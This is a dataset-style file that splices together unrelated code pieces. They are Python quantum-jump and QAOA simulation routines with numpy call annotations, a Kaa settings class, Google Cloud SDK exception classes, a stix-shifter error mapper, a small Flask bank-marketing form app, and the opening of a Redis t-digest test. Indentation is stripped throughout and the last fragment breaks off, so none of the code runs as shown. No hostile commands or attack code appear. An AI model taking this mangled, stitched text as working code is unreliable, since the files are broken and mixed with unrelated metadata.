#Local operator at position pos
if pos>-0.1:
for jj in range(dim):
if (set([pos]).issubset(set(basis_vector[jj]))):
sigma_z_matrix[jj]=1.
#Global operator, all positions
else:
for jj in range(dim):
leng=len(basis_vector[jj])
sigma_z_matrix[jj]=leng
return sigma_z_matrix
def sigma_z_z_operator(basis_vector,pos_1,pos_2):
"""
Operator that creates the matrix representation of sigma_z(pos_1)sigma_z(pos_2).
As it is diagonal in the computational basis, we will only return a vector-type array and
later apply element-wise multiplication with the wavefunction.
"""
dim=len(basis_vector)
sigma_z_z_matrix=np.zeros(dim)
for jj in range(dim):
if (set([pos_1,pos_2]).issubset(set(basis_vector[jj]))):
sigma_z_z_matrix[jj]=1.
return sigma_z_z_matrix
def get_indices(basis_vector_loc,indices):
"""
This function will return the indices for which the basis vectors are possibly
connected to the input vector by a sigma^x operator. Increasing number of excitations.
"""
n_initial=indices[len(basis_vector_loc)+1]
if not len(basis_vector_loc)+2<len(indices):
return (-1,-1)
n_final=indices[len(basis_vector_loc)+2]
return (n_initial,n_final)
###OBSERVABLES ROUTINES
def expectation_value(psi,H_2):
"""Function that computes the expectation value of H_2. """
Hpsi=np.multiply(H_2,psi)
return np.vdot(psi,Hpsi)
def expected_shortfall(H,psi,H_2,seuil):
"""Function that computes the expected shortfall of H_2. """
val=0.
prob=0.
integer=len(psi)-1
while prob<(seuil-0.00001):
prob+=abs(psi[integer])**2
val+=abs(psi[integer])**2*len(H[integer])
integer-=1
return -val/prob
def expectation_value_rho(rho,H_2):
"""Function that computes the expectation value of H_2. """
return np.trace(H_2@rho )
def expected_shortfall_rho(H,rho,H_2,seuil):
"""Function that computes the expected shortfall of H_2. """
return np.trace(H_2@rho )
#val=0.
#prob=0.
#integer=len(psi)-1
#while prob<(seuil-0.00001):
# prob+=abs(psi[integer])**2
# val+=abs(psi[integer])**2*len(H[integer])
# integer-=1
#return -val/prob
def compute_observable(H,psi,H_2,**kwargs):
"""Function called to evaluate the observable on the wavefunction."""
if settings.type_observable[0]=="energy":
return (expectation_value(psi,H_2)).real
elif settings.type_observable[0]=="cVAR":
if settings.type_observable[1]==0.:
raise ValueError('could not find a positive threshold value for the expected shortfall')
else:
progressive=kwargs.get('var_progressive',False)
if not progressive:
return (expected_shortfall(H,psi,H_2,settings.type_observable[1])).real
else:
seuil_progressive=kwargs.get('seuil_var_progressive',False)
return (expected_shortfall(H,psi,H_2,seuil_progressive)).real
def compute_observable_rho(H,rho,H_detuning,**kwargs):
"""Function called to evaluate the observable on the density matrix."""
H_2=square_mat(H_detuning)
if settings.type_observable[0]=="energy":
return (expectation_value_rho(rho,H_2)).real
elif settings.type_observable[0]=="cVAR":
if settings.type_observable[1]==0.:
raise ValueError('could not find a positive threshold value for the expected shortfall')
else:
return (expected_shortfall_rho(rho,psi,H_2,settings.type_observable[1])).real
####TIME-EVOLUTION ROUTINES#####
def get_derivative(mat_diag,mat_Rabi,**kwargs):
"""Returns function for t-evolution of the wavefunction using scipy.integrate.solve_ivp"""
tunneling=kwargs.get('tunneling','on')
if tunneling=='off':
def H_on_psi_loc(tt,yy):
return -1j*np.multiply(mat_diag,yy)
return H_on_psi_loc
else:
def H_on_psi_loc(tt,yy):
return -1j*np.multiply(mat_diag,yy)-1j*(mat_Rabi @yy)
return H_on_psi_loc
def square_mat(diagonal_matrice):
dim=len(diagonal_matrice)
mat_square=np.zeros((dim, dim),dtype=complex)
for mm in range(dim):
mat_square[mm,mm]=diagonal_matrice[mm]
return mat_square
def get_derivative_density_matrix(mat_diag,mat_Rabi,sigma_moins_array,**kwargs):
"""
Returns function for t-evolution using the numerical integration of the density matrix
\dot{\rho}=-i(H_eff \rho-\rho H_eff^{\dagger})
+\Gamma \sum_j \sigma_j^_ \rho \sigma_j^+
"""
dim=len(mat_diag)
tunneling=kwargs.get('tunneling','on')
if tunneling=='off':
def L_on_rho_loc(tt,yy):
yy=np.reshape(yy, (dim,dim))
H_eff=csr_matrix(square_mat(mat_diag))
deriv=-1j*(H_eff @ yy- yy @ (H_eff.conj()).transpose())+settings.Gamma*sum(sig @ yy @ (sig.transpose()) for sig in sigma_moins_array)
return np.reshape(deriv, dim*dim)
return L_on_rho_loc
else:
def L_on_rho_loc(tt,yy):
yy=np.reshape(yy, (dim,dim))
H_eff=csr_matrix(mat_Rabi+square_mat(mat_diag))
deriv=-1j*(H_eff @ yy- yy @ (H_eff.conj()).transpose())+settings.Gamma*sum(sig @ yy @ (sig.transpose()) for sig in sigma_moins_array)
return np.reshape(deriv, dim*dim)
return L_on_rho_loc
def evol_scipy(psi,mat_diag,mat_Rabi,tf,k,rn=-1,**kwargs):
"""
Main time-evolution function for the wavefunction.
"""
dissipative=settings.dissipation
indices=kwargs.get('indices',0.)
basis_vector=kwargs.get('basis_vector',0.)
mat_Rabi=csr_matrix(mat_Rabi) #The Rabi matrix is a sparse matrix
H_on_psi=get_derivative(mat_diag,mat_Rabi,**kwargs)
t_span=(0.,tf)
#Coherent time-evolution.
if not dissipative:
sol=scipy.integrate.solve_ivp(H_on_psi, t_span, psi, method='RK45',
t_eval=None, dense_output=False,
events=None, vectorized=False)
values=sol.y
psi=values[ : , -1]
#Dissipative time-evolution. Jumps allowed.
else:
if rn<0:
rn=random.random() #random number. if norm(psi)<rn, then jump.
is_norm_positive=get_test_jump(rn) #Automatic stopping of the time-evolution
is_norm_positive.terminal=True #if the norm of psi gets below rn.
finished=False
while not finished:
sol=scipy.integrate.solve_ivp(H_on_psi, t_span, psi, method='RK45',
t_eval=None, dense_output=False,
events=is_norm_positive, vectorized=False)
values=sol.y
psi=values[ : , -1]
if len(sol.t_events[0])<1: #We reached the final time without jump.
finished=True
else: #There is a jump
(type,tab)=compute_jump_probas(psi,basis_vector,k)
m=get_jump_index(tab,k)
(psi,mat_Rabi)=quantum_jump(type,basis_vector,psi,mat_diag,mat_Rabi,indices,m)
#Update of the Hamiltonian, time-span and random number
H_on_psi=get_derivative(mat_diag,mat_Rabi,**kwargs)
t_span=(sol.t[-1],tf)
rn=random.random()
is_norm_positive=get_test_jump(rn)
is_norm_positive.terminal=True
return (psi,mat_Rabi,rn)
def evol_scipy_rho(rho0,matdiag,mat_Rabi,tf,k,**kwargs):
"""
Main time-evolution function for the density matrix.
"""
indices=kwargs.get('indices',0.)
basis_vector=kwargs.get('basis_vector',0.)
mat_Rabi=csr_matrix(mat_Rabi)
sigma_moins_tab=[]
for jjj in k:
sigma_moins_tab.append(csr_matrix(sigma_moins_operator(basis_vector,indices,jjj)))
L_on_rho=get_derivative_density_matrix(matdiag,mat_Rabi,sigma_moins_tab,**kwargs)
t_span=(0.,tf)
rho0=np.reshape(rho0, len(matdiag)*len(matdiag))
sol=scipy.integrate.solve_ivp(L_on_rho, t_span, rho0, method='RK45',
t_eval=None, dense_output=False, vectorized=False)
values=sol.y
rho=values[ : , -1]
rho=np.reshape(rho, (len(matdiag),len(matdiag)))
return rho
####JUMP routines###
def get_test_jump(rn):
""""Decorated. This function returns the function to evaluate for stopping of t-evol."""
def norm_positive_loc(t,y):
return np.linalg.norm(y)**2-rn
return norm_positive_loc
def get_jump_index(tab,k):
"""This function returns the index of the jump."""
rn2=random.random()
temp=0.
m=0
while temp<rn2:
temp+=tab[m]
m+=1
return k[m-1]
def quantum_jump(type,basis_vector,psi_loc,mat_diagloc,mat_Rabiloc,indices,location_jump):
"""This function computes the effect of a quantum jump, returns the new wf and the Ham."""
if type=="Emission": #Jump by spontaneous emission
(psi_new,indices_to_delete)=jump_elements(basis_vector,psi_loc,indices,location_jump)
rn=random.random()
if rn<settings.branching_ratio: #If one goes to the uncoupled
ido=np.identity(mat_Rabiloc.shape[0]) #ground state, we set the corresponding
for a in indices_to_delete: #matrix elements to zero, so that further
ido[a,a]=0. #re-excitation will not be possible
ido=csr_matrix(ido)
for mm in indices_to_delete:
mat_Rabiloc=ido@mat_Rabiloc@ido
return (psi_new/np.linalg.norm(psi_new),mat_Rabiloc)
else: #Jump by dephasing, here no modification of mat_Rabi
psi_new=dephasing(basis_vector,psi_loc,location_jump)
return (psi_new/np.linalg.norm(psi_new),mat_Rabiloc)
def compute_jump_probas(psi,basis_vector,k):
"""This function computes the probabilities of jumps, and the type \in {Emission,Dephasing}."""
tab=np.zeros(settings.N)
G=settings.Gamma #taux emission spontanee
g=settings.gamma_deph #taux dephasing
rn3=random.random() #Determination of the type of event
if rn3<=G/(g+G):
type="Emission"
else:
type="Dephasing"
p_tot=0.
for mm in k: #we loop over all the possible jump sites.
H_loc=-1j/2.*sigma_z_operator(basis_vector,mm) #Creation of jump operators
Hpsi=np.multiply(H_loc,psi)
tab[mm]=abs(np.vdot(psi,1j*Hpsi)) #Probability of jump mm
p_tot+=abs(np.vdot(psi,1j*Hpsi))
return (type,tab/p_tot)
def jump_elements(basis_vector,psi_loc,indices,location_jump):
"""
This function will return the new wavefunction after a jump at position location_jump on psi_loc
It will also return the indices of the Hamiltonian to set to zero after the jump if there is a
jump towards the uncoupled ground state.
"""
index_to_delete=[]
psi_new=np.zeros_like(psi_loc)
for ii,basis_vector_loc in enumerate(basis_vector):
if (set([location_jump]).issubset(set(basis_vector_loc))): #The jump site is part of the target
continue #vector --> Not concerned
(n_initial,n_final)=get_indices(basis_vector_loc,indices) #Get the indices to look for the parent state
if n_initial<0. or n_final<0.: #Parent state do not exist.
continue
for mm in range(n_initial,n_final):
if set(basis_vector_loc)|set([location_jump])==set(basis_vector[mm]):
psi_new[ii]=psi_loc[mm] #we set the target value to the
index_to_delete.append(mm) #parent value, and add the parent
return (psi_new,index_to_delete) #index to the list for future possible deletion.
def dephasing(basis_vector,psi_loc,location_jump):
"""This function will return the new wavefunction after a dephasing event at position location_jump on psi_loc."""
psi_new=np.zeros_like(psi_loc)
for ii,basis_vector_loc in enumerate(basis_vector):
if (set([location_jump]).issubset(set(basis_vector_loc))): #The jump site is part of the target
continue #vector --> Not concerned
psi_new[ii]=psi_loc[ii] #else, projection.
return psi_new
####RUN routines. Different kinds of evolutions.
def QAOA_single_run_observable(theta,H,psi_l,H_Rabi,H_detuning,H_diss,indices,k,N_max=102,N_min=50,stability_threshold=0.04):#settings.stability_threshold):
# We can make it a little bit more modular as well.
p=int(len(theta))
val_tab=[]
for kk in range(N_max):
psi=psi_l
mat_Rabi=H_Rabi
rn=-1
for pp in range(p):
if pp%2==0:
mat_diag=H_diss
(psi,mat_Rabi,rn)=evol_scipy(psi,mat_diag,mat_Rabi,theta[pp],k,rn,basis_vector=H,
indices=indices)
mat_Rabi=H_Rabi
else:
mat_diag=H_detuning+H_diss
if settings.type_evolution=="mixte":
(psi,mat_Rabi,rn)=evol_scipy(psi,mat_diag,mat_Rabi,theta[pp],k,rn,basis_vector=H,
indices=indices)
mat_Rabi=H_Rabi
else:
(psi,mat_Rabi,rn)=evol_scipy(psi,mat_diag,mat_Rabi,theta[pp],k,rn,basis_vector=H,
indices=indices,tunneling='off')
mat_Rabi=H_Rabi
###We compute the observable only at the end of the calculation
psi=psi/np.linalg.norm(psi)
val_tab.append(compute_observable(H,psi,H_detuning))
##Test if we have gathered enough statistics for the precision threshold that we ask. We also ask a min number of traj
if np.std(val_tab)/np.sqrt(kk+1.)<stability_threshold and kk>N_min:
return np.mean(val_tab)
return np.mean(val_tab)
def QAOA_single_run_observable_density_matrix(theta,H,rho0,H_Rabi,H_detuning,H_diss,indices,k):
# We can make it a little bit more modular as well.
p=int(len(theta))
rho=rho0
mat_Rabi=H_Rabi
for pp in range(p):
if pp%2==0:
mat_diag=H_diss
rho=evol_scipy_rho(rho,mat_diag,mat_Rabi,theta[pp],k,basis_vector=H,
indices=indices)
else:
mat_diag=H_detuning+H_diss
if settings.type_evolution=="mixte":
rho=evol_scipy_rho(rho,mat_diag,mat_Rabi,theta[pp],k,basis_vector=H,
indices=indices)
else:
rho=evol_scipy_rho(rho,mat_diag,mat_Rabi,theta[pp],k,basis_vector=H,
indices=indices,tunneling='off')
###We compute the observable only at the end of the calculation
val_obs=compute_observable_rho(H,rho,H_detuning)
return val_obs
|
[
"numpy.trace",
"numpy.zeros_like",
"numpy.multiply",
"numpy.std",
"numpy.vdot",
"numpy.zeros",
"numpy.transpose",
"numpy.identity",
"copy.copy",
"random.random",
"scipy.sparse.csr_matrix",
"numpy.mean",
"numpy.reshape",
"numpy.linalg.norm",
"numpy.sqrt"
] |
[((731, 751), 'numpy.zeros', 'np.zeros', (['(dim, dim)'], {}), '((dim, dim))\n', (739, 751), True, 'import numpy as np\n'), ((2582, 2595), 'numpy.zeros', 'np.zeros', (['dim'], {}), '(dim)\n', (2590, 2595), True, 'import numpy as np\n'), ((3320, 3333), 'numpy.zeros', 'np.zeros', (['dim'], {}), '(dim)\n', (3328, 3333), True, 'import numpy as np\n'), ((4056, 4077), 'numpy.multiply', 'np.multiply', (['H_2', 'psi'], {}), '(H_2, psi)\n', (4067, 4077), True, 'import numpy as np\n'), ((4088, 4106), 'numpy.vdot', 'np.vdot', (['psi', 'Hpsi'], {}), '(psi, Hpsi)\n', (4095, 4106), True, 'import numpy as np\n'), ((4531, 4550), 'numpy.trace', 'np.trace', (['(H_2 @ rho)'], {}), '(H_2 @ rho)\n', (4539, 4550), True, 'import numpy as np\n'), ((4673, 4692), 'numpy.trace', 'np.trace', (['(H_2 @ rho)'], {}), '(H_2 @ rho)\n', (4681, 4692), True, 'import numpy as np\n'), ((6814, 6849), 'numpy.zeros', 'np.zeros', (['(dim, dim)'], {'dtype': 'complex'}), '((dim, dim), dtype=complex)\n', (6822, 6849), True, 'import numpy as np\n'), ((8301, 8321), 'scipy.sparse.csr_matrix', 'csr_matrix', (['mat_Rabi'], {}), '(mat_Rabi)\n', (8311, 8321), False, 'from scipy.sparse import csr_matrix\n'), ((10582, 10602), 'scipy.sparse.csr_matrix', 'csr_matrix', (['mat_Rabi'], {}), '(mat_Rabi)\n', (10592, 10602), False, 'from scipy.sparse import csr_matrix\n'), ((11501, 11516), 'random.random', 'random.random', ([], {}), '()\n', (11514, 11516), False, 'import random, copy\n'), ((12961, 12981), 'numpy.zeros', 'np.zeros', (['settings.N'], {}), '(settings.N)\n', (12969, 12981), True, 'import numpy as np\n'), ((13180, 13195), 'random.random', 'random.random', ([], {}), '()\n', (13193, 13195), False, 'import random, copy\n'), ((14155, 14177), 'numpy.zeros_like', 'np.zeros_like', (['psi_loc'], {}), '(psi_loc)\n', (14168, 14177), True, 'import numpy as np\n'), ((15322, 15344), 'numpy.zeros_like', 'np.zeros_like', (['psi_loc'], {}), '(psi_loc)\n', (15335, 15344), True, 'import numpy as np\n'), ((17369, 17385), 'numpy.mean', 'np.mean', (['val_tab'], {}), '(val_tab)\n', (17376, 17385), True, 'import numpy as np\n'), ((394, 409), 'numpy.transpose', 'np.transpose', (['M'], {}), '(M)\n', (406, 409), True, 'import numpy as np\n'), ((11988, 12003), 'random.random', 'random.random', ([], {}), '()\n', (12001, 12003), False, 'import random, copy\n'), ((13604, 13627), 'numpy.multiply', 'np.multiply', (['H_loc', 'psi'], {}), '(H_loc, psi)\n', (13615, 13627), True, 'import numpy as np\n'), ((7372, 7398), 'numpy.reshape', 'np.reshape', (['yy', '(dim, dim)'], {}), '(yy, (dim, dim))\n', (7382, 7398), True, 'import numpy as np\n'), ((7614, 7642), 'numpy.reshape', 'np.reshape', (['deriv', '(dim * dim)'], {}), '(deriv, dim * dim)\n', (7624, 7642), True, 'import numpy as np\n'), ((7728, 7754), 'numpy.reshape', 'np.reshape', (['yy', '(dim, dim)'], {}), '(yy, (dim, dim))\n', (7738, 7754), True, 'import numpy as np\n'), ((7979, 8007), 'numpy.reshape', 'np.reshape', (['deriv', '(dim * dim)'], {}), '(deriv, dim * dim)\n', (7989, 8007), True, 'import numpy as np\n'), ((8881, 8896), 'random.random', 'random.random', ([], {}), '()\n', (8894, 8896), False, 'import random, copy\n'), ((12110, 12143), 'numpy.identity', 'np.identity', (['mat_Rabiloc.shape[0]'], {}), '(mat_Rabiloc.shape[0])\n', (12121, 12143), True, 'import numpy as np\n'), ((12408, 12423), 'scipy.sparse.csr_matrix', 'csr_matrix', (['ido'], {}), '(ido)\n', (12418, 12423), False, 'from scipy.sparse import csr_matrix\n'), ((13647, 13672), 'numpy.vdot', 'np.vdot', (['psi', '(1.0j * Hpsi)'], {}), '(psi, 1.0j * Hpsi)\n', (13654, 13672), True, 'import numpy as np\n'), ((13742, 13767), 'numpy.vdot', 'np.vdot', (['psi', '(1.0j * Hpsi)'], {}), '(psi, 1.0j * Hpsi)\n', (13749, 13767), True, 'import numpy as np\n'), ((17038, 17057), 'numpy.linalg.norm', 'np.linalg.norm', (['psi'], {}), '(psi)\n', (17052, 17057), True, 'import numpy as np\n'), ((17341, 17357), 'numpy.mean', 'np.mean', (['val_tab'], {}), '(val_tab)\n', (17348, 17357), True, 'import numpy as np\n'), ((6543, 6568), 'numpy.multiply', 'np.multiply', (['mat_diag', 'yy'], {}), '(mat_diag, yy)\n', (6554, 6568), True, 'import numpy as np\n'), ((10190, 10205), 'random.random', 'random.random', ([], {}), '()\n', (10203, 10205), False, 'import random, copy\n'), ((11357, 11374), 'numpy.linalg.norm', 'np.linalg.norm', (['y'], {}), '(y)\n', (11371, 11374), True, 'import numpy as np\n'), ((12537, 12560), 'numpy.linalg.norm', 'np.linalg.norm', (['psi_new'], {}), '(psi_new)\n', (12551, 12560), True, 'import numpy as np\n'), ((12770, 12793), 'numpy.linalg.norm', 'np.linalg.norm', (['psi_new'], {}), '(psi_new)\n', (12784, 12793), True, 'import numpy as np\n'), ((1518, 1544), 'copy.copy', 'copy.copy', (['basis_vector_ii'], {}), '(basis_vector_ii)\n', (1527, 1544), False, 'import random, copy\n'), ((6662, 6687), 'numpy.multiply', 'np.multiply', (['mat_diag', 'yy'], {}), '(mat_diag, yy)\n', (6673, 6687), True, 'import numpy as np\n'), ((17257, 17272), 'numpy.std', 'np.std', (['val_tab'], {}), '(val_tab)\n', (17263, 17272), True, 'import numpy as np\n'), ((17273, 17290), 'numpy.sqrt', 'np.sqrt', (['(kk + 1.0)'], {}), '(kk + 1.0)\n', (17280, 17290), True, 'import numpy as np\n')]
|
import os
ROOT_DIR = os.path.dirname(os.path.abspath(__file__))
"""
Simple settings file for the in-and-outs of Kaa.
"""
class KaaSettings:
'Should we try to parallelize the generator calculations?'
Parallelize = True
'''
The optimiation procedure to use in the bundle transformation. Optimization procedures are located in kaa.opts
Takes the strings "Kodiak" or "Bernstein"
'''
OptProd = "Kodiak"
'Suppress Output?'
SuppressOutput = False
'Number of samples to be used for volume estimation'
VolumeSamples = 10000
'Seed for random.seed'
RandSeed = 897987178
'Save the flowpipe when error appears during transformation'
SaveStateonError = True
'Path for data directory to save all xlsx files from experiments.'
DataDir = os.path.join(ROOT_DIR, "data")
'Flag to trigger enveloping box threshold checking'
UseThreshold = False
'Run Normalization method if condition number becomes too large.'
NormalizeLinDir = True
'Evaluate and simplify the polynomial after performing functional composition.'
EvalFinalPoly = False
class DebugSettings:
TimerProfileLabels = set()
class PlotSettings:
'Fonts for the indices on matplotlib plots'
PlotFont = 27
'Toggle to save the figures to disk'
save_fig = True
'Path to save figures'
default_fig_path = os.path.join(ROOT_DIR, "figures")
'Figure dimensions'
fig_size = (60, 60)
NumSteps = 2
|
[
"os.path.abspath",
"os.path.join"
] |
[((37, 62), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (52, 62), False, 'import os\n'), ((796, 826), 'os.path.join', 'os.path.join', (['ROOT_DIR', '"""data"""'], {}), "(ROOT_DIR, 'data')\n", (808, 826), False, 'import os\n'), ((1371, 1404), 'os.path.join', 'os.path.join', (['ROOT_DIR', '"""figures"""'], {}), "(ROOT_DIR, 'figures')\n", (1383, 1404), False, 'import os\n')]
|
# -*- coding: utf-8 -*- #
# Copyright 2014 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Base exceptions for the Cloud SDK."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import os
import sys
from googlecloudsdk.core.util import platforms
import six
class _Error(Exception):
"""A base exception for all Cloud SDK errors.
This exception should not be used directly.
"""
pass
class InternalError(_Error):
"""A base class for all non-recoverable internal errors."""
pass
class Error(_Error):
"""A base exception for all user recoverable errors.
Any exception that extends this class will not be printed with a stack trace
when running from CLI mode. Instead it will be shows with a message of how
the user can correct this problem.
All exceptions of this type must have a message for the user.
"""
def __init__(self, *args, **kwargs):
"""Initialize a core.Error.
Args:
*args: positional args for exceptions.
**kwargs: keyword args for exceptions, and additional arguments:
- exit_code: int, The desired exit code for the CLI.
"""
super(Error, self).__init__(*args)
self.exit_code = kwargs.get('exit_code', 1)
class MultiError(Error):
"""Collection of Error instances as single exception."""
def __init__(self, errors):
super(MultiError, self).__init__(', '.join(str(e) for e in errors))
class RequiresAdminRightsError(Error):
"""An exception for when you don't have permission to modify the SDK.
This tells the user how to run their command with administrator rights so that
they can perform the operation.
"""
def __init__(self, sdk_root):
message = (
'You cannot perform this action because you do not have permission '
'to modify the Google Cloud SDK installation directory [{root}].\n\n'
.format(root=sdk_root))
if (platforms.OperatingSystem.Current() ==
platforms.OperatingSystem.WINDOWS):
message += (
'Click the Google Cloud SDK Shell icon and re-run the command in '
'that window, or re-run the command with elevated privileges by '
'right-clicking cmd.exe and selecting "Run as Administrator".')
else:
# Specify the full path because sudo often uses secure_path and won't
# respect the user's $PATH settings.
gcloud_path = os.path.join(sdk_root, 'bin', 'gcloud')
message += (
'Re-run the command with sudo: sudo {0} ...'.format(gcloud_path))
super(RequiresAdminRightsError, self).__init__(message)
class NetworkIssueError(Error):
"""An error to wrap a general network issue."""
def __init__(self, message):
super(NetworkIssueError, self).__init__(
'{message}\n'
'This may be due to network connectivity issues. Please check your '
'network settings, and the status of the service you are trying to '
'reach.'.format(message=message))
class ExceptionContext(object):
"""An exception context that can be re-raised outside of try-except.
Usage:
exception_context = None
...
try:
...
except ... e:
# This MUST be called in the except: clause.
exception_context = exceptions.ExceptionContext(e)
...
if exception_context:
exception_context.Reraise()
"""
def __init__(self, e):
self._exception = e
self._traceback = sys.exc_info()[2]
if not self._traceback:
raise ValueError('Must set ExceptionContext within an except clause.')
def Reraise(self):
six.reraise(type(self._exception), self._exception, self._traceback)
def reraise(exc_value, tb=None): # pylint: disable=invalid-name
"""Adds tb or the most recent traceback to exc_value and reraises."""
tb = tb or sys.exc_info()[2]
six.reraise(type(exc_value), exc_value, tb)
|
[
"googlecloudsdk.core.util.platforms.OperatingSystem.Current",
"os.path.join",
"sys.exc_info"
] |
[((2459, 2494), 'googlecloudsdk.core.util.platforms.OperatingSystem.Current', 'platforms.OperatingSystem.Current', ([], {}), '()\n', (2492, 2494), False, 'from googlecloudsdk.core.util import platforms\n'), ((2937, 2976), 'os.path.join', 'os.path.join', (['sdk_root', '"""bin"""', '"""gcloud"""'], {}), "(sdk_root, 'bin', 'gcloud')\n", (2949, 2976), False, 'import os\n'), ((3954, 3968), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (3966, 3968), False, 'import sys\n'), ((4324, 4338), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (4336, 4338), False, 'import sys\n')]
|
from stix_shifter_utils.utils.error_mapper_base import ErrorMapperBase
from stix_shifter_utils.utils.error_response import ErrorCode
from stix_shifter_utils.stix_translation.src.utils.exceptions import DataMappingException, StixValidationException, \
UnsupportedDataSourceException, TranslationResultException, UnsupportedDialectException, UnsupportedLanguageException
from stix_shifter_utils.stix_translation.src.patterns.errors import SearchFeatureNotSupportedError
from stix_shifter_utils.utils import logger
error_mapping = {
NotImplementedError.__name__: [ErrorCode.TRANSLATION_NOTIMPLEMENTED_MODE, 'wrong parameter'],
DataMappingException.__name__: [ErrorCode.TRANSLATION_MAPPING_ERROR, 'data mapping error'],
StixValidationException.__name__: [ErrorCode.TRANSLATION_STIX_VALIDATION, 'stix validation error'],
SearchFeatureNotSupportedError.__name__: [ErrorCode.TRANSLATION_NOTSUPPORTED, 'search feature is not supported'],
TranslationResultException.__name__: [ErrorCode.TRANSLATION_RESULT, 'result translation error'],
UnsupportedDataSourceException.__name__: [ErrorCode.TRANSLATION_NOTIMPLEMENTED_MODE, 'unsupported datasource'],
UnsupportedDialectException.__name__: [ErrorCode.TRANSLATION_UNKNOWN_DIALOG, 'unknown dialect'],
UnsupportedLanguageException.__name__: [ErrorCode.TRANSLATION_UNKNOWN_LANGUAGE, 'unsupported language']
}
class ErrorMapper():
logger = logger.set_logger(__name__)
DEFAULT_ERROR = ErrorCode.TRANSLATION_MODULE_DEFAULT_ERROR
@staticmethod
def set_error_code(data_dict, return_obj):
exception = None
if 'exception' in data_dict:
exception = data_dict['exception']
error_code = ErrorMapper.DEFAULT_ERROR
error_message = 'Error when converting STIX pattern to data source query'
if exception is not None:
exception_type = type(exception).__name__
ErrorMapper.logger.error("received exception => {}: {}".format(exception_type, exception))
if exception_type in error_mapping:
error_code = error_mapping[exception_type][0]
error_message = error_mapping[exception_type][1]
exception_message = str(exception)
if (len(exception_message) > 0):
if len(error_message) > 0:
error_message += ' : '
error_message += exception_message
ErrorMapperBase.set_error_code(return_obj, error_code, message=error_message)
|
[
"stix_shifter_utils.utils.error_mapper_base.ErrorMapperBase.set_error_code",
"stix_shifter_utils.utils.logger.set_logger"
] |
[((1415, 1442), 'stix_shifter_utils.utils.logger.set_logger', 'logger.set_logger', (['__name__'], {}), '(__name__)\n', (1432, 1442), False, 'from stix_shifter_utils.utils import logger\n'), ((2436, 2513), 'stix_shifter_utils.utils.error_mapper_base.ErrorMapperBase.set_error_code', 'ErrorMapperBase.set_error_code', (['return_obj', 'error_code'], {'message': 'error_message'}), '(return_obj, error_code, message=error_message)\n', (2466, 2513), False, 'from stix_shifter_utils.utils.error_mapper_base import ErrorMapperBase\n')]
|
from application import app
from flask import render_template, request, json, jsonify
from sklearn import preprocessing
from sklearn.preprocessing import OneHotEncoder
import requests
import numpy
import pandas as pd
#decorator to access the app
@app.route("/")
@app.route("/index")
def index():
return render_template("index.html")
#decorator to access the service
@app.route("/bankclassify", methods=['GET', 'POST'])
def bankclassify():
#extract form inputs
age = request.form.get("age")
job = request.form.get("job")
marital = request.form.get("marital")
education = request.form.get("education")
default = request.form.get("default")
balance = request.form.get("balance")
housing = request.form.get("housing")
loan = request.form.get("loan")
#convert data to json
input_data = json.dumps({"age": age, "job": job, "marital": marital, "education": education, "default": default, "balance": balance, "housing": housing, "loan": loan})
#url for bank marketing model
url = "http://localhost:5000/api"
#url = "https://bank-model-app.herokuapp.com/api"
#post data to url
results = requests.post(url, input_data)
#send input values and prediction result to index.html for display
return render_template("index.html", age = age, job = job, marital = marital, education = education, default = default, balance = balance, housing = housing, loan = loan, results=results.content.decode('UTF-8'))
|
[
"flask.request.form.get",
"flask.json.dumps",
"flask.render_template",
"application.app.route",
"requests.post"
] |
[((248, 262), 'application.app.route', 'app.route', (['"""/"""'], {}), "('/')\n", (257, 262), False, 'from application import app\n'), ((264, 283), 'application.app.route', 'app.route', (['"""/index"""'], {}), "('/index')\n", (273, 283), False, 'from application import app\n'), ((373, 424), 'application.app.route', 'app.route', (['"""/bankclassify"""'], {'methods': "['GET', 'POST']"}), "('/bankclassify', methods=['GET', 'POST'])\n", (382, 424), False, 'from application import app\n'), ((308, 337), 'flask.render_template', 'render_template', (['"""index.html"""'], {}), "('index.html')\n", (323, 337), False, 'from flask import render_template, request, json, jsonify\n'), ((481, 504), 'flask.request.form.get', 'request.form.get', (['"""age"""'], {}), "('age')\n", (497, 504), False, 'from flask import render_template, request, json, jsonify\n'), ((515, 538), 'flask.request.form.get', 'request.form.get', (['"""job"""'], {}), "('job')\n", (531, 538), False, 'from flask import render_template, request, json, jsonify\n'), ((553, 580), 'flask.request.form.get', 'request.form.get', (['"""marital"""'], {}), "('marital')\n", (569, 580), False, 'from flask import render_template, request, json, jsonify\n'), ((597, 626), 'flask.request.form.get', 'request.form.get', (['"""education"""'], {}), "('education')\n", (613, 626), False, 'from flask import render_template, request, json, jsonify\n'), ((641, 668), 'flask.request.form.get', 'request.form.get', (['"""default"""'], {}), "('default')\n", (657, 668), False, 'from flask import render_template, request, json, jsonify\n'), ((683, 710), 'flask.request.form.get', 'request.form.get', (['"""balance"""'], {}), "('balance')\n", (699, 710), False, 'from flask import render_template, request, json, jsonify\n'), ((725, 752), 'flask.request.form.get', 'request.form.get', (['"""housing"""'], {}), "('housing')\n", (741, 752), False, 'from flask import render_template, request, json, jsonify\n'), ((764, 788), 'flask.request.form.get', 'request.form.get', (['"""loan"""'], {}), "('loan')\n", (780, 788), False, 'from flask import render_template, request, json, jsonify\n'), ((832, 994), 'flask.json.dumps', 'json.dumps', (["{'age': age, 'job': job, 'marital': marital, 'education': education,\n 'default': default, 'balance': balance, 'housing': housing, 'loan': loan}"], {}), "({'age': age, 'job': job, 'marital': marital, 'education':\n education, 'default': default, 'balance': balance, 'housing': housing,\n 'loan': loan})\n", (842, 994), False, 'from flask import render_template, request, json, jsonify\n'), ((1154, 1184), 'requests.post', 'requests.post', (['url', 'input_data'], {}), '(url, input_data)\n', (1167, 1184), False, 'import requests\n')]
|
#!/usr/bin/env python3
import os
from random import randint
from RLTest import Env
from redis import ResponseError
import redis
import sys
import random
import math
is_valgrind = True if ("VGD" in os.environ or "VALGRIND" in os.environ) else False
def parse_tdigest_info(array_reply):
reply_dict = {}
